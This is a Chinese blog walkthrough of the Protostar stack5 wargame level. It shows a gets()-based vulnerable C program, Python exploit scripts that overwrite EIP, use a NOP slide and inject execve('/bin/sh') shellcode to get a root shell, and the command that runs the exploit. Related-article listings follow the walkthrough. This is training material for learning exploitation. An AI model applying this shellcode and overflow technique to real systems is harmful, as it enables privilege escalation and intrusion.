Buffer Overflow with Shellcode-protostar-stak5-bin-0x06

最新推荐文章于 2022-03-10 22:30:57 发布
最新推荐文章于 2022-03-10 22:30:57 发布
阅读量474 收藏
点赞数
分类专栏: LiveOverflow-binary hacking
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25899635/article/details/93966444
版权

Stack5是一个标准的缓冲区溢出,这次介绍shellcode的利用。
调试shellcode,使用带有操作码\xcc(int3) 指令停止程序执行并返回调试器。
stack5.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char *argv[]){
	char buffer[64];
	gets(buffer);
}

非常简短的的代码,只有一个gets()函数的调用,从前边stack0已经知道它允许我们覆盖数据到堆栈上。这里演示如何提权到root shell的操作。

利用前边介绍的方法找到eip的偏移并生成一个payload

import struct
padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS"
eip = struct.pack("I", 0XBFFFFC70)
payload = "\xCC"*4
print padding+eip+payload

但由于有时候执行程序的环境变量的不同,这就需要不同大小的空间来存储它,从而导致了堆栈地址的不同。两种方式:
1、在执行二进制文件之前删除所有环境变量
  $ env -i ./mv_program
  (gdb) unset env
2、添加NOP指令,NOP指令不做任何操作,并且它具有十六进制操作符90
这里不再选择一个具体的堆栈地址作为跳转地址

import struct
padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS"
eip = struct.pack("I", 0XBFFFFC70+70)
payload = "\x90"*100+"\xCC"*4
print padding+eip+payload

使用gdb进行调试,发现’90’大概位于堆栈的中间部分,这就跳过了某些不可控因素。
在这里插入图片描述
我们寻找并使用一些shellcode:

Disassembly of section .text:

08048060 <_start>:
 8048060: 31 c0                 xor    %eax,%eax
 8048062: 50                    push   %eax
 8048063: 68 2f 2f 73 68        push   $0x68732f2f
 8048068: 68 2f 62 69 6e        push   $0x6e69622f
 804806d: 89 e3                 mov    %esp,%ebx
 804806f: 89 c1                 mov    %eax,%ecx
 8048071: 89 c2                 mov    %eax,%edx
 8048073: b0 0b                 mov    $0xb,%al
 8048075: cd 80                 int    $0x80
 8048077: 31 c0                 xor    %eax,%eax
 8048079: 40                    inc    %eax
 804807a: cd 80                 int    $0x80

import struct
padding = "A"*76
eip = struct.pack("I", 0xbffffcc0+70)
nopslide = "\x90"*100
payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
print padding+eip+nopslide+payload

$ (python exploit.py ; cat) | /opt/protostar/bin/stack5

Mandorr
关注
专栏目录
(SEED-Lab)Buffer Overflow Vulnerability Lab缓冲区溢出实验
lunan的博客
02-01 7595
(SEED-Lab)Buffer Overflow Vulnerability Lab 欢迎大家访问我的GitHub博客 https://lunan0320.cn 文章目录一、实验目的二、实验步骤与结果2.1 环境初始化2.2 Task1 运行shellcode2.3漏洞程序2.4 Task 22.5 Task 3: ASLR2.6 Task 4: Stack Guard2.7 Task 5:不可执行栈三、参考文献 一、实验目的 理解缓冲区溢出攻击的原理以及如何实施攻击 理解针对缓冲区溢出的防御措施
浅析缓冲区溢出漏洞的利用与Shellcode编写
道阻且长,行则将至。
09-30 6463
文章目录前言 前言 缓冲区是内存中存放数据的地方。在程序试图将数据放到及其内存中的某一个位置的时候,因为没有足够的空间就会发生缓冲区溢出。缓冲区溢出就好比是将十升水放进只有五升容量的桶里。很显然,一旦容器满了,余下的部分就会溢出在地板上,弄得一团糟。缓冲区溢出漏洞是指在程序试图将数据放到及其内存中的某一个位置的时候,因为没有足够的空间就会发生缓冲区溢出的现象。 ...
First Exploit! Buffer Overflow with Shellcode - bin 0x0E
weixin_42732173的博客
01-07 184
stack5 Stack5 is a standard buffer overflow, this time introducing shellcode. This level is at /opt/protostar/bin/stack5 Hints: at this point in time, it might be easier to use someone elses shellcode if debugging the shellcode, use \xcc (int3...
缓冲溢出Shellcode 代码
jackydai987的专栏
03-04 851
汇编程序:main() { __asm __emit 0x90 __asm __emit 0x90 __asm { mov ebp, esp push ebp ;获取kernel32.dll的基址 保存于eax pu
【缓冲区溢出】栈溢出原理 | 简单shellcode编写
VI___
02-02 4634
一、Buffer Overflow Vulnerability ESP:该指针永远指向系统栈最上面一个栈帧的栈顶 EBP:该指针永远指向系统栈最上面一个栈帧的底部 缓冲区溢出漏洞的原理就是因为输入了过长的字符,而缓冲区本身又没有有效的验证机制,导致过长的字符将返回地址覆盖掉了,当函数需要返回的时候,由于此时的返回地址是一个无效地址,因此导致程序出错。 那...
Lab1 Buffer OverFlow
Thare_Lam
11-08 1450
Lab OverViewImportant Note: This course’s labs, including this lab, ask you to design exploits and to perform attacks. These exploits and attacks are realistic enough that you might be able to use them
shellcode-resources:关于Shellcode的资源
03-20
Shellcode Shellcode相关资源,150多个工具,500多个文章 目录 -> -> -> -> -> -> -> -> -> -> 开发&&编写 Shellen 工具 [ 706星] [1y] [Py] 相互转换Shellcode开发环境 文章 2018.03 [freebuf] 2018.02 [pediy...
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
L9-3-2021必做-overflow-to-shellcode1
08-03
5. **Shellcode**: Shellcode通常需要避开系统的安全机制,例如NX(No eXecute)保护,它防止栈上的数据被执行。在32位Linux系统中,可能需要找到不使用`ret`指令的Shellcode,因为`ret`可能已经被溢出的数据覆盖。...
shellcode-to-dll:shellcode 异或加密并生成dll
04-23
在“shellcode-to-dll”项目中,我们看到的是将shellcode进行异或加密,并将其封装到动态链接库(DLL)文件中的过程。这一方法的目的是提高shellcode的隐蔽性和抗分析能力,因为原始的shellcode很容易被反病毒软件...
Mechanica_Tolerance_Stackup_And_Analysis
01-06
Mechanica_Tolerance_Stackup_And_Analysis
[SEEDLabs]buffer overflow
痛苦实验记录
03-10 7286
纠结又纠结的实验,希望下次老师能讲清楚每个实验的要求……解决好前面的问题之后,后面几个上手就没有那么困难了。我果然还是学的太不扎实了,也缺少相关经验,磨蹭了好久才弄出来,羞愧。 1.环境配置 首先是配置虚拟机,在官网可以下载vitual box可用的镜像,然后自己安装一下。提前配置好的虚拟机自己不用调节很多。 然后讲一讲这个实验。我们做的版本是Buffer Overflow Attack Lab (Server Version),在Ubuntu2...
溢出基础
|游梦空间|
11-22 696
Buffer Overflow 机理剖析 使用Buffer Overflow 方法来入侵目的主机是黑客们经常采用的一种手段,本文将几篇介绍其机理的文章作了一些加工整理, 对它的机理作出了由浅入深的剖析. 本文分为下面几个部分, 朋友们可以按照自己的兴趣选择不同的章节: 关于堆栈的基础知识 Buffer Overflow 的原理 Shell Code 的编写 实际运用中遇到的问题 附录 ------
缓存溢出Buffer Overflow
远有青山
01-29 9758
缓存溢出(Buffer overflow),是指在存在缓存溢出安全漏洞的计算机中,攻击者可以用超出常规长度的字符数来填满一个域,通常是内存区地址。在某些情况下,这些过量的字符能够作为“可执行”代码来运行。从而使得攻击者可以不受安全措施的约束来控制被攻击的计算机。 缓存溢出(或译为缓冲溢出)为黑客最为常用的攻击手段之一,蠕虫病毒对操作系统高危漏洞的溢出高速与大规模传播均是利用此技术。
ORU-10027: buffer overflow, limit of 10000 bytes
weixin_34032792的博客
10-12 144
错误提示: ERROR at line 1: ORA-20000: ORU-10027: buffer overflow, limit of 1000000 bytes ORA-06512: at “SYS.DBMS_OUTPUT”, line 32 ORA-06512: at “SYS.DBMS_OUTPUT”, line 97 ORA-0651...
audioFlinger提示recordThread:buffer overflow错误解决
热门推荐
wz19870429的专栏
11-15 1万+
今天解决领导遇到的一个问题,在使用audiorecord读取语音数据的时候提示audioFlinger audioThread:buffer overflow,使用的机器是MOTO G的。 操作系统是android 4.4。在网上找了很多,最后还是解决了,这里记录下。 代码参考网上的例子写的。 public class AudioThread { private static f
Buffer-Overflow Vulnerability Lab——山东大学网络攻防实验
我有一颗五角星
04-19 9374
实验给出了一个有缓冲区溢出漏洞的程序stack.c,它会从文件中读取数据,并拷贝至自己的缓冲区。我们需要利用这个漏洞获得root权限,通过精心设计exploit.c 攻击程序,使其利用用户程序的漏洞产生badfile 文件,从而使用户程序读取badfile 时,被攻击者控制。 此外,我们将接触在Linux中实施的几种保护方案,并评估其有效性。
搬砖:Buffer Overflow
hunter
01-17 938
Buffer Overflow 卡德尔先生   前言 CS 161 is the voodoo plan of Lord Dirks. Project 1 is the first step. 这个project 1做的我心态爆炸 感觉自己还是不是很懂汇编指令 特别是esp寄存器 基本知识介绍 stackStructure.png 上图是linux x86系列的内存结构。...
一次奇怪的Stack buffer overflow - code c0000409
yxmlhc的专栏
10-18 4145
程序莫名其妙的崩溃了,在VS下还是没问题的,扔到虚拟机上就不行,很奇怪。又试了一下debug版,其实是没问题的。 可是就是报错,错误模块名称: ucrtbase.dll,版本: 10.0.16299.522,时间戳: 0xeb197031 WinDBG都试了,还是这个问题。然后突然的对比了一下debug和release的目录,发现了问题,不知道谁在release目录下放了一个msvcp140....
Buffer-Overflow Attack Lab
最新发布
12-27
Buffer-Overflow Attack Lab是一个用于学习和实践缓冲区溢出攻击的实验。通过这个实验,你可以更好地理解缓冲区溢出攻击的原理和实现方式,并学习如何保护系统免受此类攻击。 在Buffer-Overflow Attack Lab中,你将面对一个具有缓冲区溢出漏洞的程序。你的目标是利用这个漏洞,以执行恶意代码或者获取系统权限。通过完成这个实验,你将学习到以下内容: 1. 理解缓冲区溢出攻击的原理:了解缓冲区溢出攻击是如何利用程序中的漏洞来执行恶意代码的。 2. 漏洞利用技术:学习如何利用缓冲区溢出漏洞来修改程序的执行流程,以执行恶意代码或者获取系统权限。 3. Shellcode编写:了解如何编写Shellcode,这是一段用于执行特定操作的机器码。 4. 栈布局和内存管理:了解程序在内存中的布局,包括栈帧、函数调用和返回等。 5. 缓冲区溢出的防御措施:学习如何通过使用安全编程技术和安全开发实践来防止缓冲区溢出攻击。 为了完成Buffer-Overflow Attack Lab,你需要按照实验指导书中的步骤进行操作,并使用提供的工具和代码来进行实验。在实验过程中,你将学习到如何构造恶意输入,以触发缓冲区溢出漏洞,并利用这个漏洞来执行恶意代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值